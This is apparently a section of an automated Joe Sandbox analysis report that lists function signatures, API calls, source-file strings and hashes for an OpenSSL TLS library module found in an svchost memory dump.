                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: J_txt2nid$O_freeO_malloc$R_pop_to_markR_set_markX_freeX_new_from_pkeyY_freeY_newY_set_type
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2333482861-1168734446
                                                                                              • Opcode ID: a0203abc5a4591652255303bf45ce65235f6d511b84468b6f80e0d53690d7b30
                                                                                              • Instruction ID: e391436339b51d543cda96c4999b7e1d9ff73ba5ca77c44f7847c666d0c20104
                                                                                              • Opcode Fuzzy Hash: a0203abc5a4591652255303bf45ce65235f6d511b84468b6f80e0d53690d7b30
                                                                                              • Instruction Fuzzy Hash: 5D719CA2A4ABD281E622DF25E5443AE73A4FB48B84F448135DEAC07765EF3CE194C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocR_vset_error
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_alpn
                                                                                              • API String ID: 3020875438-2890585513
                                                                                              • Opcode ID: 7b209afc501ae09b01466415b08320be48d7339cdf014afa69a2f58078974435
                                                                                              • Instruction ID: ce3d6591c650b30a813468fafc46b198048465ff867bcb1ca50cde50b1b135c9
                                                                                              • Opcode Fuzzy Hash: 7b209afc501ae09b01466415b08320be48d7339cdf014afa69a2f58078974435
                                                                                              • Instruction Fuzzy Hash: A3518FA1A0AAC281EB629B31D4417BC2391EB84B84F448535DF2D4B7A6DF3DE5A1C341
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$N_bin2bnN_is_zeroN_ucmpO_freeO_strdupR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_cke_srp
                                                                                              • API String ID: 3252685116-3145630846
                                                                                              • Opcode ID: 5bf10ccabd700325957d56873c561422542e91a143714dd2baa69b102e430cbe
                                                                                              • Instruction ID: 2746af8e897d5c7c28d9fce9731a7b6a9adc62ad3da065cf50eab46050479e7b
                                                                                              • Opcode Fuzzy Hash: 5bf10ccabd700325957d56873c561422542e91a143714dd2baa69b102e430cbe
                                                                                              • Instruction Fuzzy Hash: 614182A1B4A64281FB62AB71D8E27BD1351EF84B84F44C531DE2D477B2DE2DE5958300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_unlock$D_read_lockH_retrieveR_vset_errormemcmpmemcpy
                                                                                              • String ID: ssl\ssl_sess.c$ssl_get_prev_session
                                                                                              • API String ID: 2587384529-1744558562
                                                                                              • Opcode ID: de1761987cc89580968eccc00f2af673244997937e6e504fdddd4961b237f54c
                                                                                              • Instruction ID: de44568caab7373b3a6249f490beddc8976dd27eca8cc03a876ff4bb046a6579
                                                                                              • Opcode Fuzzy Hash: de1761987cc89580968eccc00f2af673244997937e6e504fdddd4961b237f54c
                                                                                              • Instruction Fuzzy Hash: 2BC185B3A0A68282EB66DB31D4997BE2360FB44B84F188131DE6E477A5DF7CE445C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$O_freeR_set_debug$O_strdup
                                                                                              • String ID: final_server_name$p$ssl\statem\extensions.c
                                                                                              • API String ID: 3774429508-4160180063
                                                                                              • Opcode ID: 7a8e350ca873b5178b897236a786d86059de5b1c77bc8007a1f8b38c6f7f3925
                                                                                              • Instruction ID: 06a63f0192cad6c40f0901eace25f51b67a1229a0008d7ab8e69347bc0018413
                                                                                              • Opcode Fuzzy Hash: 7a8e350ca873b5178b897236a786d86059de5b1c77bc8007a1f8b38c6f7f3925
                                                                                              • Instruction Fuzzy Hash: 09716FB2A0B68285FB639B35D4A43BD2390EB81B84F148036DE6D476B5CE3DE5C5C301
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocmemcpy
                                                                                              • String ID: ssl\statem\extensions_clnt.c$ssl_next_proto_validate$tls_parse_stoc_npn
                                                                                              • API String ID: 1393888195-3563213302
                                                                                              • Opcode ID: 0321e7d9c51b55cd8405629f0ca98423d0ea0a627311ea4e9d4e6617c1bfaf81
                                                                                              • Instruction ID: 9f662d4790a50bfb2be704147b300a9ffacf781ef5e07375201a804be640143a
                                                                                              • Opcode Fuzzy Hash: 0321e7d9c51b55cd8405629f0ca98423d0ea0a627311ea4e9d4e6617c1bfaf81
                                                                                              • Instruction Fuzzy Hash: 4B51C0E1A1AB8241EB529BB1E8517B967A0EF84744F44C432EE6D437B6DF3CE585CB00
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_free$D_run_onceL_sk_findL_sk_pushO_mallocR_set_error
                                                                                              • String ID: SSL_COMP_add_compression_method$ssl\ssl_ciph.c
                                                                                              • API String ID: 2747923163-4252575135
                                                                                              • Opcode ID: 2608b874bdf970e33d35009282d8f2afa5c6041aa4f20bfb7062e935cf2445e9
                                                                                              • Instruction ID: 452645875c0202a9629ac95cbab7882ab80a1ea047398d709d04c4ef67a7c292
                                                                                              • Opcode Fuzzy Hash: 2608b874bdf970e33d35009282d8f2afa5c6041aa4f20bfb7062e935cf2445e9
                                                                                              • Instruction Fuzzy Hash: D431ADA8E5B61341FA669732E8922BD1B54EF44780F44C436ED7D476B6DE2CE9098300
                                                                                              APIs
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D04E
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D07A
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D086
                                                                                              • OSSL_STACK_OF_X509_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D093
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0AD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0E2
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0F8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D10E
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D117
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D120
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D145
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D15B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D170
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$E_freeX509_X509_freeY_free
                                                                                              • String ID: ssl\ssl_cert.c
                                                                                              • API String ID: 1233721043-188639428
                                                                                              • Opcode ID: 505530dc6204a26c7951dd06b761be4010829963c1e1916f816e13e1b3343860
                                                                                              • Instruction ID: 8d65d528dd1cfa5cd4c5726e778332143abd7980ef730ddab3e6aca73fe00250
                                                                                              • Opcode Fuzzy Hash: 505530dc6204a26c7951dd06b761be4010829963c1e1916f816e13e1b3343860
                                                                                              • Instruction Fuzzy Hash: 17415EB1B5AA5281EB21DF36D8821BC2724FB85B94F009035DE6D577A6CF3CE565C304
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$Y_free$L_sk_pop_freeO_clear_freememset
                                                                                              • String ID: ssl\s3_lib.c
                                                                                              • API String ID: 4031674668-3639828702
                                                                                              • Opcode ID: 56749a7fe6fc518fbc9008921f35fdd5fde7fc96ec0f361e55d887f79028f0f3
                                                                                              • Instruction ID: 6a579c09683262977ecc33634d67b897e9f5814351c74ffb82b062ea257aa641
                                                                                              • Opcode Fuzzy Hash: 56749a7fe6fc518fbc9008921f35fdd5fde7fc96ec0f361e55d887f79028f0f3
                                                                                              • Instruction Fuzzy Hash: E0415CF1B5A64391EB12EB72D4923BD2310FF95B88F448436DE2D4B2A6CE6DE1048321
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$R_family$R_clearR_newR_set_debugR_vset_error
                                                                                              • String ID: ensure_channel_started$failed to configure channel$failed to start assist thread$failed to start channel$quic_do_handshake$ssl\quic\quic_impl.c
                                                                                              • API String ID: 3860484807-2058648542
                                                                                              • Opcode ID: 709b0479125af6ee5ac48bb5abcca979a97a6efaebdf1b3626366b99a557ea16
                                                                                              • Instruction ID: 1ada45673fe06c8e28ab951a3afc8be45f3c98d30a02b5e4faf3e438232088d8
                                                                                              • Opcode Fuzzy Hash: 709b0479125af6ee5ac48bb5abcca979a97a6efaebdf1b3626366b99a557ea16
                                                                                              • Instruction Fuzzy Hash: E7F190B2A0AA4282FB61DB39E8407A96760FB84794F448231EF6C476E5DF7CE955C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastO_test_flagsO_writeR_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_retry_write_records$tls_write_records
                                                                                              • API String ID: 1843479370-2458201149
                                                                                              • Opcode ID: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                              • Instruction ID: aabe523c6a4e6d5606578b04a507db8ac05573ca66f7d47791d32c8641fedbd6
                                                                                              • Opcode Fuzzy Hash: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                              • Instruction Fuzzy Hash: 67719DA2A0AA4286F7669B35D5853BC33A6FB44B84F148531CF2D43BA5DF39E4A5C340
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$D_bytes_exO_freeO_mallocR_set_debug
                                                                                              • String ID: $ssl\statem\statem_srvr.c$tls_construct_certificate_request
                                                                                              • API String ID: 2305228085-806604038
                                                                                              • Opcode ID: bb80a541e2be7fc510b037927f3aa9222f1d912873188c196b9917cbd6a94ab0
                                                                                              • Instruction ID: 69bb2117957b9cdb534108c89248176be744e720727e5184c38f4f4656d87935
                                                                                              • Opcode Fuzzy Hash: bb80a541e2be7fc510b037927f3aa9222f1d912873188c196b9917cbd6a94ab0
                                                                                              • Instruction Fuzzy Hash: D35185A1B0A28341FB629B72D9967BD6391AF45BC8F04C431DE2D4B7E6DF2DE4418311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocR_newR_set_debug
                                                                                              • String ID: dtls_rlayer_buffer_record$ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 681801835-4006006387
                                                                                              • Opcode ID: c0be3d0c48b42ea7a3bf253bd351074edd90b1d770ed0058c570f0b1e35f4c5e
                                                                                              • Instruction ID: 24c2c957b4777eb4308392fc44e40120b11089e6fa2ad0f9598558bbf107f614
                                                                                              • Opcode Fuzzy Hash: c0be3d0c48b42ea7a3bf253bd351074edd90b1d770ed0058c570f0b1e35f4c5e
                                                                                              • Instruction Fuzzy Hash: 700280B2A09B8282E722DF35E5446B933A4FB55788F05D235DEAC47AA5DF38E1D4D300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$M_freeM_move_peernameR_newR_set_debugR_set_errorX509_X509_freeX_free
                                                                                              • String ID: ossl_ssl_connection_reset$ssl\ssl_lib.c
                                                                                              • API String ID: 1979470287-3605862542
                                                                                              • Opcode ID: a0e50fe9858149fb5504f71899189a664d0a7bb69c524f79330ce00391df7f72
                                                                                              • Instruction ID: 6f033dab08a8d39f5eb4cf4615bd6de32a351b8220ba6308c8a33c7642d4f009
                                                                                              • Opcode Fuzzy Hash: a0e50fe9858149fb5504f71899189a664d0a7bb69c524f79330ce00391df7f72
                                                                                              • Instruction Fuzzy Hash: 5D5173B2A4678281E751DF36D4812BD73A8FB84B98F08813ADE6D4B7A9DF38D4418711
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdupR_newR_set_debug
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\extensions_srvr.c$tls_parse_ctos_alpn
                                                                                              • API String ID: 779157885-3465918099
                                                                                              • Opcode ID: 3eac08784322b4d9d4b7decba0d182fbbab740dc8df8de132ad9510753ac3106
                                                                                              • Instruction ID: 2d1974a4e1efcca7f0e479c3c38d1749b8530119d868283fd856627f886b11f9
                                                                                              • Opcode Fuzzy Hash: 3eac08784322b4d9d4b7decba0d182fbbab740dc8df8de132ad9510753ac3106
                                                                                              • Instruction Fuzzy Hash: 0B41C4F1A0ABC181EB228BB5E4513B963A1EF45784F048535DFAC17AB6DF3CE1918704
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_malloc
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_ec_pt_formats
                                                                                              • API String ID: 3068916411-1105300127
                                                                                              • Opcode ID: d20b543ee3beebe62d088556f6f6e37ec077b4b20800f490c5f8ce5d9407d9a8
                                                                                              • Instruction ID: 0e9b8f81679dd6c0a871b85f899833d6313aecfcedb8024d4a7d92a49d18f82b
                                                                                              • Opcode Fuzzy Hash: d20b543ee3beebe62d088556f6f6e37ec077b4b20800f490c5f8ce5d9407d9a8
                                                                                              • Instruction Fuzzy Hash: FE31E4A1A5EB9281F622DB71E8417FD6760EB44788F40C131DEAC477A6DF3CE2958700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_free$O_free
                                                                                              • String ID: ssl\tls_srp.c
                                                                                              • API String ID: 3506937590-1545769946
                                                                                              • Opcode ID: a0aa9d723761bc43066e25d67ce36c56aafca2db69a64f76014dba336a3dd019
                                                                                              • Instruction ID: 15074d5d2aa31d9a1763fdf58db1893e945ece215511c581cc99887977cab251
                                                                                              • Opcode Fuzzy Hash: a0aa9d723761bc43066e25d67ce36c56aafca2db69a64f76014dba336a3dd019
                                                                                              • Instruction Fuzzy Hash: A721DDA2E55A8281EB61EF71C8A13FC3350EB95B4CF199131DE1D4B16ADF28D5D68310
                                                                                              APIs
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA33
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA44
                                                                                              • memcmp.VCRUNTIME140(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA63
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA80
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA91
                                                                                              • memcmp.VCRUNTIME140(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EAB0
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EB0E
                                                                                              • BIO_ADDR_clear.LIBCRYPTO-3-X64 ref: 00007FFBAB45EC1E
                                                                                              • BIO_ADDR_clear.LIBCRYPTO-3-X64 ref: 00007FFBAB45EC48
                                                                                              Strings
